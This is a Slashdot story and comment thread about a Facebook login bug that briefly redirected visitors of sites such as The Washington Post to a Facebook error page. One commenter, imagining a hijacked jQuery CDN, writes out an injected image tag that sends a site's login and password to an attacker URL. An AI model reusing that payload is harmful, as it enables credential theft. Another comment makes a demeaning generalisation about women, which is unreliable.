Slashdot Mirror


Facebook Breaks Major Websites With Redirection Bug

johnsnails writes "Some of the biggest news sites in the world disappeared yesterday when Facebook took over the internet with a redirection bug. Visitors to sites such as The Washington Post, BuzzFeed, the Gawker network, NBC News and News.com.au were immediately transferred to a Facebook error page upon loading their intended site. It was fixed quickly, and Facebook provided this statement: 'For a short period of time, there was a bug that redirected people logging in with Facebook from third party sites to Facebook.com. The issue was quickly resolved, and Login with Facebook is now working as usual.'"

179 comments

  1. so... by liamevo · · Score: 5, Insightful

    can we please stop relying on third parties for things *you* should be providing to your users.

    1. Re:so... by Seumas · · Score: 5, Funny

      Hey, just because all of my forum stuff comes from Disqus, my word of mouth spreading comes from twitter, facebook, and google plus integrations, and my content comes from automatic AP feeds doesn't mean I don't provide anything myself! I . . . . uh . . . .

    2. Re:so... by orthancstone · · Score: 5, Insightful

      On one hand, I'd prefer to see authentication in the hands of someone I consider more reliable (like Google) than someone programmer of questionable ability at (Insert Random Dying Newspaper here).

      On the other hand, a hearty "HA HA!" does feel appropriate here. They do get what they are asking for by being so deeply tied to a third party.

    3. Re:so... by deains · · Score: 1

      Let's just get in touch every CDN in existence and get them to shut down everything they're doing then. Clearly centralising providers of commonly-used resources is an abysmally terrible idea.
       
      (Sarcasm, just in case you can't tell)

    4. Re:so... by hobarrera · · Score: 1

      IMHO, OpenID is better. Whether google is trustworthy or not is a matter of opinion, and google can be just another OpenID provider. If we want a single provider, the world will never settle for a single trusted entity.

    5. Re:so... by ElmoGonzo · · Score: 1

      I've less quarrel with the concept of using a 3rd party to verify identity (that's what a driver's license does when we aren't on line) than with the notion of using the services of a "free" site that gets its revenue by tracking its users and selling that information to advertisers and the like. And do I want to stay logged in to something like Facebook when it is exposing my information (not all of which is bogus fiction) to anyone who has access to their API? And yes, Google is doing much of the same as are numerous others.

    6. Re:so... by squiggleslash · · Score: 1

      Kinda. The thing is that the reliable programmers who specialize in this kind of thing work for companies like Disqus, whose jobs revolve 100% around this. However, random PHB at ${dying newspaper} has never heard of Disqus, but has heard of Facebook, which similarly to the newspaper employs many programmers, few of whom consider it the primary job of their organization to help, and not f--- up, third party websites.

      If Disqus (or Livewyre or whatever) ever made this kind of screw up, they'd seriously destroy their credibility, but unfortunately....

      --
      You are not alone. This is not normal. None of this is normal.
    7. Re:so... by saveferrousoxide · · Score: 5, Funny

      I deal with the goddamn customers!

    8. Re:so... by CastrTroy · · Score: 4, Interesting

      I know a guy who does this. He pulls in about $50 a month with a site that basically runs itself. The only reason I don't do it is because the "ads" he ends up generating money off of are the kind that pay out when the visitor to his site installs a tool bar or some other nefarious thing. The only reason I wouldn't do that is that I don't think it's ethically correct to lure people into installing stuff they don't want on their computer. But I imagine that someone who's ambitious enough, and who sets up enough sites could generate quite a bit of money like this.

      --

      Anthropic principle: We see the universe the way it is because if it were different we would not be here to see it.
    9. Re:so... by Dragonslicer · · Score: 1

      Exactly. After all, nobody that's ever written their own authentication code has ever screwed it up.

    10. Re:so... by sinij · · Score: 1

      >>>I deal with the goddamn customers! And if you don't like it, you can program goddamn login page yourself!

    11. Re:so... by rwise2112 · · Score: 1

      I deal with the goddamn customers!

      I have people skills, damnit!

      --

      "For every expert, there is an equal and opposite expert"
    12. Re:so... by Anonymous Coward · · Score: 0

      Just think, every single one of those websites are feeding Facebook tracking info about it's users, that facebook then resales to advertisers and stuff..

    13. Re:so... by LandDolphin · · Score: 1

      haha

      --
      Spelling and Grammar errors have been added to this post for your enjoyment
    14. Re:so... by davester666 · · Score: 2

      ...said the person who just finished installing an autoreply bot...

      --
      Sleep your way to a whiter smile...date a dentist!
    15. Re:so... by Jane+Q.+Public · · Score: 1

      "... can we please stop relying on third parties for things *you* should be providing to your users."

      Actually, this probably didn't come from anything that is "provided" to customers.

      Typically, when you link your site to Facebook (especially if you're not careful), you include a piece of JavaScript that Facebook supplies. Essentially, it's user-tracking, which is NOT a service "provided" to site visitors, unless you happen to like that sort of thing.

      Sadly, many websites actually pull this JavaScript in realtime from Facebook itself, rather than hard-coding the JavaScript into their page.

      So at any time, all Facebook has to do is change this JavaScript in a single location at their own web service, to affect all users of that JavaScript, everywhere. (Except for those few smart folks to hard-code it in the page.)

    16. Re:so... by icebraining · · Score: 1

      Facebook JS files are not open source; by "hardcoding them", you're actually committing copyright infringement.

    17. Re: so... by Anonymous Coward · · Score: 0

      He's contributing to society by keeping slashdot posters employed.

      We are the people tasked with removing that stuff.

      We are the people that sell you your new computer because your 3 year old one has 10 toolbars and is getting slow.

      We are the people that write, install or sell software to combat this.

      So, while your friend might be seen as a sociopathic jerk...you could try to see the bright side of it if you need to convince yourself it's worth 50 bucks a month (plus your soul).

    18. Re:so... by Jane+Q.+Public · · Score: 1

      "Facebook JS files are not open source; by "hardcoding them", you're actually committing copyright infringement."

      So? It's still the better way to go about it. The host company (like Google or Facebook) will never know. And if you don't? Look at the poor schmucks in TFA.

      Of course, if you do that it has to be updated periodically; the host company can't update it on your site, so you have to.

      But I am most definitely not in favor of making my websites hostage to other web services for their basic operation. That's just asking for trouble. As we can clearly see here.

    19. Re:so... by icebraining · · Score: 1

      Oh, and if you hardcode them, how do you expect them to be able to do XHR requests to their servers, in violation of the same origin policy? There's no point in serving JS if you prevent it from working.

    20. Re:so... by Jane+Q.+Public · · Score: 1

      "Oh, and if you hardcode them, how do you expect them to be able to do XHR requests to their servers, in violation of the same origin policy? There's no point in serving JS if you prevent it from working."

      I've never used any that did that, and wouldn't use any that did that. That's a violation of MY policy.

    21. Re:so... by Vanessagirl · · Score: 1

      There are a lot of blackhatters doing this, or used to do this, some Google updates can ruin your income. Check out autoblogging. No need for Pay-Per-Download of malicious addons, you can do just fine with other acceptable PPC or CPA

    22. Re:so... by cavebison · · Score: 1

      He pulls in about $50 a month with a site that basically runs itself.

      Not bad. A site that pays for its own development in 2 years is not something to sneeze at, it took Facebook a lot longer than that.

    23. Re:so... by Common+Joe · · Score: 1

      On one hand, I'd prefer to see authentication in the hands of someone I consider more reliable (like Google) than someone programmer of questionable ability at (Insert Random Dying Newspaper here).

      I question what we are doing wrong in the computer world where we need a 3rd party just so that our users can securely login to a simple system that we create. I get that there are a lot of attack vectors. Why? What did we do wrong? Can we improve it so that it is simple to do a login?

    24. Re:so... by anguirus.x · · Score: 1

      There are a lot of blackhatters doing this, or used to do this, some Google updates can ruin your income. Check out autoblogging. No need for Pay-Per-Download of malicious addons, you can do just fine with other acceptable PPC or CPA

      Mix in some SEO and this is not uncommon.

  2. Congrats by Anonymous Coward · · Score: 5, Insightful

    If you let others insert scripts into your pages they can steal your visitors.

    Maybe it'll make sites think about who they script src from.

    1. Re:Congrats by FireFury03 · · Score: 4, Insightful

      If you let others insert scripts into your pages they can steal your visitors.

      Maybe it'll make sites think about who they script src from.

      One of the bad things I've noticed recently is that HSBC is including objects from third party organisations in their ebanking login pages. I do wonder if any thought has gone into the security of such things, or if HSBC simply don't care (my experience of banks tells me that none of them have a single clue when it comes to internet security).

    2. Re:Congrats by Anonymous Coward · · Score: 1

      Use RequestPolicy and you'll be in control of what websites include from third parties.

    3. Re:Congrats by CanHasDIY · · Score: 0

      If you let others insert scripts into your pages they can steal your visitors.

      Maybe it'll make sites think about who they script src from.

      One of the bad things I've noticed recently is that HSBC is including objects from third party organisations in their ebanking login pages. I do wonder if any thought has gone into the security of such things, or if HSBC simply don't care (my experience of banks tells me that none of them have a single clue when it comes to internet security).

      HSBC launders money for drug kingpins and terrorists.

      You should really find a new bank.

      --
      An enigma, wrapped in a riddle, shrouded in bacon and cheese
    4. Re:Congrats by Anonymous Coward · · Score: 2, Funny

      Well if drug kingpins and terrorists use them, they must be a pretty good bank.

    5. Re:Congrats by Anonymous Coward · · Score: 0

      Maybe that's why I'm a customer!

  3. And... by Anonymous Coward · · Score: 1

    ...people wonder i some of us block external crap on sites, not just ads.

    1. Re:And... by Anonymous Coward · · Score: 0, Offtopic

      I shudder thinking what havoc you could cause if you'd manage to hijack one of big JS library CDNs.

      For example, just imagine every copy of jQuery from Google's CDN also including instructions to add '<img src="http://buttfuck.me/lol?domain=$window.domain&login=$login&pass=$pass">' on clicking login button - even if it'd be up for just a few minutes, you'd still probably get millions of user accounts sent to you.

      Economical impact would be huge, with thousands of sites scouring logs and resetting compromised logins and users having to check and reset every password.

      Only a tiny minority is uses NoScript, and then some sites require scripts to function - so you should also use some tricks to replace them with locally cached versions. I really hope those CDN servers are in secure location with write access only for verified personnel physically present on site.

    2. Re:And... by lattyware · · Score: 2

      Which is why we should be asking for two-factor auth on every site, and using unique random passwords stored in a password vault for websites that need passwords. That way, if someone gets your password, it's a) useless without your phone b) useless for any other site. Unfortunately, it's extra hassle for developer and end user, so only a few people do it.

      --
      -- Lattyware (www.lattyware.co.uk)
  4. Good. by Seumas · · Score: 1

    Serves every one of these websites for being Facebook lemmings.

    1. Re:Good. by Anonymous Coward · · Score: 2, Funny

      They prefer to be called facebook serfs

    2. Re:Good. by jadv · · Score: 0

      Nowadays they call them "employees" because the word "serf" has been banned by the PC crowd.

  5. use adblock+ to block social media extensions by Anonymous Coward · · Score: 1

    The fanboy adblock lists include another list you can add which also blocks out all social media badges etc.

    1. Re:use adblock+ to block social media extensions by Hsien-Ko · · Score: 1

      Ghostery is another weapon in the defense too

  6. Shocking. by Anonymous Coward · · Score: 0

    Anyone surprised?

  7. Here Endeth The Lesson. by fuzzyfuzzyfungus · · Score: 2

    Not that it will; but let that be a lesson to you.

    1. Re:Here Endeth The Lesson. by RobertLTux · · Score: 1

      No NO NO you have to do it right

      [play sound: THX Big Note.wav] THUS ENDETH THE LESSON

      but anywho if i was one of those sites i would have my legal staff have a chat with Facebook about not having this happen again EVER.

      --
      Any person using FTFY or editing my postings agrees to a US$50.00 charge
    2. Re:Here Endeth The Lesson. by alostpacket · · Score: 1

      Thanks teach! I have learned that people rarely learn the lesson. I think. Will this be on the final exam?

      --
      PocketPermissions Android Permission Guide
  8. Um... How? by camperdave · · Score: 1

    How is that possible? If I'm going to a site, I type in the URL into the address bar, or I click on a favorite, or click on a link returned by Google, or another search engine. The URL gets sent to a DNS server, which returns the IP address of the site, and then my browser starts making http requests directly from the site. Facebook is never involved. Unless Facebook has somehow poisoned the root DNS servers, I don't see how this is possible.

    --
    When our name is on the back of your car, we're behind you all the way!
    1. Re:Um... How? by belthize · · Score: 3, Interesting

      I suspect horrible article is the main culprit. At a guess I suspect this is nothing more that Facebook's authentication service failing.

      Client is directed to Facebook for authentication, mechanism fails, Facebook tosses up error page. The implication that Facebook did anything wrong other than having buggy authentication is likely way of base.

      Full disclosure, don't have a facebook page, never visited a facebook page, have zero interest in facebook.

    2. Re:Um... How? by Anonymous Coward · · Score: 0

      They must have dropped an erroneous document.location = facebook in their JS that all these sites include so you can "like" them

    3. Re:Um... How? by Culture20 · · Score: 3, Informative

      These sites are including javascript from facebook. Check your noscript/requestpolicy lists on those pages and you'll be surprised how many external sites those pages include javascript and images from. This was bound to happen (and worse things have probably happened in secret).

    4. Re:Um... How? by Anonymous Coward · · Score: 4, Insightful

      In short, "Web bugs", short bits of code that are included inline from another provider. Basically these sites had on their front page a "get shit from facebook" or some such badge displayed, that badge is not created by the site owner but is sourced inline from facebook, now if the thing they pull from facebook is broken and facebook presents a redirect to your browser in place of the web bug (badge, whatever) then your browser dutifully redirects.

      If facebook were malicious they could commandeer half of the web.

    5. Re:Um... How? by Anonymous Coward · · Score: 2, Insightful

      The key is "client is directed to Facebook". Sites include 3rd party scripts all the time, blindly executing whatever gets sent back. If that includes a simple assignment to window.location, there's your redirect.

    6. Re:Um... How? by Anonymous Coward · · Score: 4, Interesting

      The Steam browser is a nice example of facebook javascript gone wrong. Every page with a "like" script on it redirects to some facebook address as soon as the page finishes loading. The end result is that you see what you wanted to see, but the URL bar is always some sort of lenghty facebook redirect because Steam is trying to load it somehow but fails and leaves you on the page you wanted to visit anyway.

    7. Re:Um... How? by omnichad · · Score: 1

      I successfully made it to Papa John's web site to order pizza last night. When I got to the last page of checkout, I immediately got redirected to Facebook.

      Apparently they're including Facebook Javascript code on all their pages, and I happened to be in the middle of ordering a pizza when the bug hit.

      Why Javascript is allowed to redirect a web site these days without user intervention is beyond me. Most Javascript methods that open windows or navigate you require being triggered by a click event or other human intervention.

    8. Re:Um... How? by camperdave · · Score: 1

      So all these webmasters put foreign code on their websites without doing any sort of sanity audit on it? Scary!

      --
      When our name is on the back of your car, we're behind you all the way!
    9. Re:Um... How? by Anonymous Coward · · Score: 0

      They didn't?? I could swear they have commandeered way more than 1/2 of the WWW.

    10. Re:Um... How? by chihowa · · Score: 2

      Worse than that. Many (most?) of them have you pull the foreign code from the foreign site directly. So even if they did audit it, the foreign site could change the code and their site would dutifully ask you to run it.

      --
      If you want a vision of the future, imagine a youtube comments section scrolling - forever.
    11. Re:Um... How? by icebraining · · Score: 1

      Slashdot itself loads a few JS files directly from third-party servers, particularly Google's (through Google Analytics).

    12. Re:Um... How? by MagdJTK · · Score: 1

      I think a lot of web apps would break if Javascript couldn't mess with the window location / back button / tab history, etc. Think of things like Gmail and Google Docs. Unlike pop-ups and so on, it does actually have a useful purpose.

    13. Re:Um... How? by omnichad · · Score: 1

      Back buttons would require a click. As long as they have to be tied in some way to a click the way pop-ups do. They aren't blocked, they just have to be proven as user-initiated.

  9. facebook by hackula · · Score: 4, Funny

    The first successful test. Soon every site will redirect to facebook, then... the world!

    1. Re:facebook by Impy+the+Impiuos+Imp · · Score: 1

      Offer multibillion IPO
      2. Seize conttol of internet
      3. ???
      4. Well, monetizing for profit is still problematic

      --
      (-1: Post disagrees with my already-settled worldview) is not a valid mod option.
    2. Re:facebook by omnichad · · Score: 1

      The ultimate phishing attack.

    3. Re:facebook by hackula · · Score: 1

      This pretty much sums up the number one problem with tech culture in the valley. Companies are optimized to raise money, not make money. Facebook has had years to switch the focus already but still cannot seem to do it. If your typical tech startup had 20 billion in the bank, the founders would say "Look how this will affect our valuation! We'll be able to get to round 98 of seed funding!"

  10. Details: Logging in from 3rd party sites? by Anonymous Coward · · Score: 1

    I was logged into Facebook when I got this redirect.

    However, the website I got it from is one I have never placed a Facebook "like" on or written a comment on with my profile.

    Does "a bug that redirected people logging in with Facebook from third party sites" mean that the site has my Facebook details?

    The URL was this:

    https://www.facebook.com/dialog/permissions.request?client_id=__15digitno__&response_type=token%2Csigned_request%2Ccode&display=none&domain=www.website.com&origin=1&redirect_uri=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D18%23cb%3Df28691eaa8%26origin%3Dhttp%253A%252F%252Fwww.website.com%252Ff1c830d484%26domain%3Dwww.website.com%26relation%3Dparent&sdk=joey

    1. Re:Details: Logging in from 3rd party sites? by SJHillman · · Score: 5, Informative

      The third-party sites load a chunk of Facebook onto their site, so if you're logged into Facebook then you're logged into that chunk on the third-party site. The third-party site doesn't have your login or information - it's passed between you and the chunk of Facebook on that site. Or at least, that's how it's supposed to work.

      It's not the 90's anymore... you can load a page that's connected to dozens of different services that are almost completely independent of each other and the page you're on.

    2. Re:Details: Logging in from 3rd party sites? by Anonymous Coward · · Score: 1

      You don't need to like or comment. You have been logged automatically (as in: they know where you've been). It's a feature!

    3. Re:Details: Logging in from 3rd party sites? by Mitreya · · Score: 1

      It's not the 90's anymore... you can load a page that's connected to dozens of different services that are almost completely independent of each other and the page you're on.

      Yes, but do we have to?
      Most of those websites look crippled until the last of these dozen services finally loads 3 minutes later. Blockbuster.com used to hang (unresponsive) for about 30 seconds while the browser said "contacting adserve...fb.com".

    4. Re:Details: Logging in from 3rd party sites? by CanHasDIY · · Score: 1

      It's not the 90's anymore... you can load a page that's connected to dozens of different services that are almost completely independent of each other and the page you're on.

      For some reason, that makes me a sad panda... :(

      --
      An enigma, wrapped in a riddle, shrouded in bacon and cheese
    5. Re:Details: Logging in from 3rd party sites? by alostpacket · · Score: 1

      sdk=joey?

      function getJoey()
      {
              return "Doh";
      }

      --
      PocketPermissions Android Permission Guide
    6. Re:Details: Logging in from 3rd party sites? by Secret+Agent+Man · · Score: 1

      Most of those websites look crippled until the last of these dozen services finally loads 3 minutes later.

      I know, right? Browsing the web with NotScript (Chrome extension) is a real eye-opener. Some sites simply load as a blank white screen until you whitelist scripts to run! It's especially good when you first open a site, it has three sources for scripts, then when you enable one, suddenly 15 more appear in the list. It's great being able to disable most of the junk people toss on sites from the get-go, but sometimes it's irritating to have to dig through the long chain of scripts just to make a web site functional. Eventually I just give up and go with "run all temporarily."

      I hope we get to a point where web sites can't just include arbitrary scripts to run from third party sites, but then we might have issues of people hosting the cruddy stuff from their own host, making filtering harder. A catch-22, for sure.

  11. Single point of failure by Anonymous Coward · · Score: 2, Interesting

    Recently we have seen very widespread "single point of failure" issues. Notably with Facebook and Apple who are both so pervasive in society. These firms are constantly doing major and complicated software updates and those updates are propagated either invisibly in the background or introduced through "voluntary" software updates where you don't get major new features unless you do the update and you have to simply live with whatever bugs or feature cripples come along with it.

    The fact so many people are dependent on these very small number of very human folks is a large "single point of failure" risk for society and its individual, business, and government segments.

    JJ

    1. Re:Single point of failure by Anonymous Coward · · Score: 0

      What was the apple one? I don't recollect it

    2. Re:Single point of failure by SJHillman · · Score: 3, Informative

      I use Facebook, I admit it. However, I only use Facebook for Facebook. If I log in to another site, I don't use the "Connect with Facebook" option to log in. If the site only allows you to log in with Facebook, I leave. I've yet to find a mission critical site like banks, etc that use Facebook or another service. Therefore, I'm doing my part to save humanity from the single point of failure.

    3. Re:Single point of failure by FireFury03 · · Score: 1

      What was the apple one? I don't recollect it

      The only one I can remember was when the server that responds to WISPr probes went down, rendering everyone's ipad unable to connect to a network...

      Background:
      When an iOS device associates with a wifi network, it makes a web request to apple's server to see if its behind a captive portal. It expects to get back "SUCCESS" (returned by Apple's server) or a captive portal login page (returned by the wifi hotspot). If it doesn't get "SUCCESS" it displays the captive portal page so the user can log in. Unfortunately, Apple's software is unable to cope with the web request not being answered at all, and you end up with a blank "login" page and a non-funcational network connection. Yes, this is the usual quality I've come to expect from Apple, given the numerous problems I've had to deal with since iOS devices started to get popular in the workplace...

    4. Re:Single point of failure by Anonymous Coward · · Score: 0

      It's worse than a single point of failure. I remember when twitter broke on a site and would redirect me to the twitter error page if I didn't hit escape fast enough as a page loaded.

      This is multiple parallel points of complete failure.

    5. Re:Single point of failure by SuricouRaven · · Score: 1

      Windows does the same thing, but AFAIK the only thing that happens if it doesn't get the OK response is the user gets a little popup balloon from the system tray warning them an internet connection is not available.

    6. Re:Single point of failure by alostpacket · · Score: 1

      Unfortunately it sounds like this bug would have hit users such as yourself also. I think when leaving FB to visit another site it is best to log out.

      Multi-instance/multi-profile browsers would also be something nice. Especially those that limit what they report about the machine they are on (less fingerprint via installed fonts/cookies/html5 dbs/flash objects/etc)

      --
      PocketPermissions Android Permission Guide
    7. Re:Single point of failure by rizole · · Score: 1

      If you stay logged in to facebag they can still track you via the part of any webpage that loads a chunk of facebag inline. I load it ina seperate browser and use ghostery on my main browser to block third party shenanigans.

    8. Re:Single point of failure by MagdJTK · · Score: 1

      When an Apple device connects to a wifi network, it checks http://www.apple.com/library/test/success.html to see if the network is connected to the Internet. Unfortunately, some bozo deleted that file...

  12. I keep trying to use Facebook. by hessian · · Score: 5, Insightful

    I've come to the conclusion that social networking is screwed up because the people who use it most are the people who are least invested in reality.

    Every time I try to use Facebook, I get driven away by the behavior of its users. Not the Instagram dinner plate updates, or the personal drama, because I've already filtered out those people.

    It's the sensitivity. People take anything seriously. I posted an article showing that divorce really screws up kids. I got back a half-dozen replies, all from people who'd had divorces, defending their own decisions. When I said that it wasn't personal, they said they still felt attacked.

    There were other instances of similar behavior too. People hover around Facebook, looking for some reason to cause a scene. Why was this, I wondered.

    It seems to me that if you have found something worth doing in life, you're mostly doing it. That doesn't mean your job. If your job sucks, you've probably got a project on the side. You're not going to devote your time to screwing around, which is what most people on Facebook do.

    This means that social networking including Facebook selects out the people who have any direction in life, and leaves the resentful, bored, unemployed, disabled, upset, insane, teenage, etc. and concentrates them in large numbers. This is why so much of the response is crazy.

    I should amend the post title. I used to keep trying to use Facebook (and MySpace, Digg, Reddit, Friendster, Pinterest, etc.). But now, I don't. These aren't places where healthy people hang out.

    1. Re:I keep trying to use Facebook. by hodet · · Score: 1

      Facebook free for three months now. I just came to the realization that I was not interacting with all the people I care about in my life on Facebook. I was interacting with them in real life. The only interaction was with "fringe" friends or people you felt obligated to friend because they are "friends of friends" you met somewhere. "Hey great, Joe's wife took a picture of her Big Mac and fries and is enjoying a delicious shake." Ya, I'm outta here.

    2. Re:I keep trying to use Facebook. by Megane · · Score: 1

      Really, the only two-way stuff I use is:

      Slashdot, because of the good moderation system and good supply of topics that I want to see other people's comments about as much as the topic itself

      and 4chan (yes, seriously) because it's sort of a zero-point energy of random discussion with its default anonymity and constantly expiring threads (it's too much hardcore internet trolling and memes for the average person though) But stay away from /b/, nothing interesting happens there anymore.

      I avoid the twits and bookfaces as much as possible. At least 4chan's social cancer is constantly flushed away, unlike twitter and facebook where it stays around and festers.

      --
      #naabhaprzrag, #sverubfr-000, #agi-fcbafberq, negvpyr[pynff*=' negvpyr-ary-'] { qvfcynl: abar !vzcbegnag; }
    3. Re:I keep trying to use Facebook. by rmdingler · · Score: 1

      Well done. I would add unhappy to your list of qualities that make up the bulk of social site users. Many of the people I know who are regular users remain in contact with old flames even though they are now like Al Bundy. Here's to hoping these extra opportunities to procreate don't result in the psychologically healthy being out-bred by this genotypical subset. Oh wait...

      --
      Happiness in intelligent people is the rarest thing I know.

      Ernest Hemingway

    4. Re:I keep trying to use Facebook. by Anonymous Coward · · Score: 0

      I feel personally attacked by your attack of people feeling attacked by your attacking them.

    5. Re:I keep trying to use Facebook. by Anonymous Coward · · Score: 0

      I got back a half-dozen replies, all from people who'd had divorces, defending their own decisions. When I said that it wasn't personal, they said they still felt attacked.

      If by "people" you mean "women who up and left their husbands because they were UNHAAAAAAAAAPPPYYYYYY" then yeah, those seem to crawl out of the woodwork with disturbing regularity.

      Same with women whose mothers did the same thing previously.

      In general, women tend to have a so-called solipsistic view of the world, everything is ABOUT THEM, even if it's pretty obvious to anyone with a brain that you made a general statement.

      The problem is, there are enough white knights around to support these future cat ladies that they'll never learn the error of their ways...

    6. Re:I keep trying to use Facebook. by Anonymous Coward · · Score: 0

      Pretty much this. It concentrates the worst people of society, and the worst reactions from others simply because they are on a computer.
      Imagine how less hostile it would be if you were forced to give your address and phone and verify it? Basic Computer Tough Guy Syndrome.

      I miss when the site was locked down to education.
      It was at least bearable then.
      Screw you Mark. At least make a second site if you wished to include the rest of the idiot society in on your information sharing.

      Somebody needs to make another non-NEET social networking site for those who aren't a worthless cumstain on society. (note that those who are unemployed but actively seeking either of those EET opportunities aren't NEET, but they at least have every right to be pissed off)
      Hell, use them to fund it, but don't let them on it. Ever.
      Of course, verifying Education is only really workable since pretty much every tertiary education institute has an e-mail address or attendance verification process, Employment is laughable at best, and Training, just, nope.

      I'm unlucky enough to be disabled from doing pretty much every job I wanted to do besides computing related stuff. (and even then, very little at that)
      I'd give anything to not be a biological wreck and do all the stuff I had planned. NOPE. So it makes me pissed off when I even remotely see these types that plague society with their stupid.
      If I was slightly more insane, I'd could probably play the live-action real life version of the dude from Saw.
      Lucky you, society. I actually want to help people.

    7. Re:I keep trying to use Facebook. by Anonymous Coward · · Score: 0

      It's the sensitivity. People take anything seriously. I posted an article showing that divorce really screws up kids. I got back a half-dozen replies, all from people who'd had divorces, defending their own decisions. When I said that it wasn't personal, they said they still felt attacked.

      Do you suppose any friends of yours who've gone through a divorce would think any different if you posted that stuff on the town hall bulletin board with your name on it?
      How would you approach the subject if you talked to them in person?
      Just a thought... maybe people's sensitivities aren't any different online, and maybe you talk about stuff online you'd know better not to at _any other_ social event.

      The Internet is like a giant public forum (helllloooooooo!), your audience is not the issue, it's you not understanding your audience.

    8. Re:I keep trying to use Facebook. by LordLucless · · Score: 1

      Every time I try to use Facebook, I get driven away by the behavior of its users. Not the Instagram dinner plate updates, or the personal drama, because I've already filtered out those people.

      It's the sensitivity. People take anything seriously. I posted an article showing that divorce really screws up kids. I got back a half-dozen replies, all from people who'd had divorces, defending their own decisions. When I said that it wasn't personal, they said they still felt attacked.

      You realize that the people "on Facebook" in this regard are your friends? You post an article, it's your friends who comment on it. What you're complaining about isn't Facebook's userbase in general, but that subset of it that you consider your friends. For what it's worth, I've had extended political and religious (basically the two most flamebait-y topics possible) discussions on Facebook where most people remained civil and presented reasoned arguments (and the few who didn't were just ignored). That's because I've surrounded myself with people who appreciate civility and reason as much as I do.

      Facebook's an enabler, with the usual GIGO provision. You put garbage friends in, you get garbage discussion out.

      --
      Just because you're paranoid doesn't mean there isn't an invisible demon about to eat your face
    9. Re:I keep trying to use Facebook. by Anonymous Coward · · Score: 0

      You forgot /.! Walks off to the dark corner of the dungen....

  13. Story Subject Fail by OzPeter · · Score: 4, Informative

    Facebook did not "Break major websites". Instead Facebook users who were logged in to Facebook (and hence working under the auspices of Facebook) were screwed over when they went to third party sites. Sheesh .. even TFS explains that.

    Are we now starting to refer to the Internet as teh Facebook???

    --
    I am Slashdot. Are you Slashdot as well?
    1. Re:Story Subject Fail by SJHillman · · Score: 1

      It broke the expected functionality of third-party websites. But I agree that Internet is not Facebook. At most, you might be able to claim Facebook broke a chunk of the WWW, but certainly not the Internet as only websites were affected. It's like saying a minor design flaw in a part used by many different car manufacturers completely disrupted our entire transportation infrastructure.

    2. Re:Story Subject Fail by Sockatume · · Score: 1

      You seem to be under the impression that it was people visiting sites from links on Facebook that had an issue. If you visited any of the sites, directly, while logged into Facebook you were affected.

      --
      No kidding!!! What do you say at this point?
    3. Re:Story Subject Fail by Bogtha · · Score: 2

      Instead Facebook users who were logged in to Facebook (and hence working under the auspices of Facebook)

      I think you've misunderstood. By "logged into Facebook", they don't mean they were actually looking at Facebook at the time. It means they had previously logged into Facebook at some point and their browser has a cookie saved which authenticates them to Facebook.

      These people were surfing the web normally. They weren't on Facebook. They got to a site that used Facebook for authentication, and the JavaScript that these sites embedded to enable that had a defect in it that noticed they were logged into Facebook and caused the error.

      From the end user's perspective, it was simply a case of surfing as normal, and then suddenly a Facebook error message hijacked the website they were trying to visit.

      --
      Bogtha Bogtha Bogtha
    4. Re:Story Subject Fail by CanHasDIY · · Score: 1

      Facebook did not "Break major websites".

      This.

      Facebook broke Facebook, and some third party sites were affected.

      --
      An enigma, wrapped in a riddle, shrouded in bacon and cheese
    5. Re:Story Subject Fail by John+Hasler · · Score: 1

      > Are we now starting to refer to the Internet as teh
      > Facebook???

      Well, you're already confounding the Web and the Net.

      --
      Warning: this article may contain humor, sarcasm, parody, and perhaps even irony. Read at your own risk.
    6. Re:Story Subject Fail by John+Hasler · · Score: 1

      > If you visited any of the sites, directly, while logged into
      > Facebook you were affected.

      And therefor it affected only Facebook users. Neither the Web nor the Net was broken. Just Facebook.

      --
      Warning: this article may contain humor, sarcasm, parody, and perhaps even irony. Read at your own risk.
    7. Re:Story Subject Fail by Anonymous Coward · · Score: 0

      And therefor it affected only Facebook users. Neither the Web nor the Net was broken. Just Facebook.

      TFTitle did not claim Facebook broke the Web or the Net. The fine title claims that Facebook broke "major websites." Which is true.

  14. If it was anyone else... by dywolf · · Score: 1

    I'd be of the mind that it wasn't a bug, but intentional. But FB? They don't really need the page views....do they? Stock has taken a bit of a dip again since the graph thing came to light...though still high enough that I'm sitting pretty (bought when it was around 19.50 or so).

    --
    The guy who said the election was rigged won the presidency with the second-most votes.
    1. Re:If it was anyone else... by Anonymous Coward · · Score: 0

      Hahahaaaa!
      You invested in a social virus.
      You should sell now, you will not be able to avoid paying the piper when fb goes all myspace on us and just isn't popular anymore because kids' parents made an account there.
      HINT: Instagram is already taking many kids from facebook, though they are kinda integrated I know several people who just have instagram now.
      The sad thing, Instagram is basically 4chan: The App.

  15. It Has Its Ups and Downs by eldavojohn · · Score: 5, Interesting

    can we please stop relying on third parties for things *you* should be providing to your users.

    Clearly it has benefits and disadvantages. One of the disadvantages is displayed in this story. I could name a decent amount of benefits though: 1) you don't have to register again and again every time you want to use some site. 2) you don't suffer from password fatigue. 3) you don't have to worry about no talent ass clowns storing your username and password in plaintext (although you do have to worry about facebook being no talent ass clowns about that). 4) if I just want to stand up a quick little site that is nothing more than CRUD associated to users then all that login stuff can be offloaded to facebook or whomever. 5) from a large corporation standpoint, you can now get additional social data about your users from the facebook api (I know, this isn't necessarily an advantage for the end user and is best viewed as double edged).

    Are you opposed to openID too?

    --
    My work here is dung.
    1. Re:It Has Its Ups and Downs by Rockoon · · Score: 4, Insightful

      Indeed.

      I think many people are in support of third party authentication semantics for non-critical sites..

      Even though ultimately facebook is probably a bad choice for it, what else is so ubiquitous as to be a reasonable option that also doesnt suffer the same essential problems (certainly not a google account?)

      --
      "His name was James Damore."
    2. Re:It Has Its Ups and Downs by DogDude · · Score: 2, Insightful

      from a large corporation standpoint, you can now get additional social data about your users from the facebook api (I know, this isn't necessarily an advantage for the end user and is best viewed as double edged).

      For an individual, there's only one edge: a sharp one. Who in their right mind would want every company/web site to know all of the intimate details of what they're doing on every other web site? Isn't it obvious to people that by signing in with a Facebook ID to web sites, that not only does Facebook track everything done, but then sells that information to everybody else? That's how those extremely complete personal profiles are created about individuals in corporate databases that are then swapped and sold indefinitely. What benefit could this possibly have for individuals?

      --
      I don't respond to AC's.
    3. Re: It Has Its Ups and Downs by Anonymous Coward · · Score: 0

      No talent ass clowns can still create apps that expose a permanent security token...So people get full access not only to that account but also most of your Facebook. And the process for revoking that access is more difficult than the average password change...

    4. Re:It Has Its Ups and Downs by whargoul · · Score: 5, Interesting

      ...what else is so ubiquitous as to be a reasonable option that also doesnt suffer the same essential problems (certainly not a google account?)

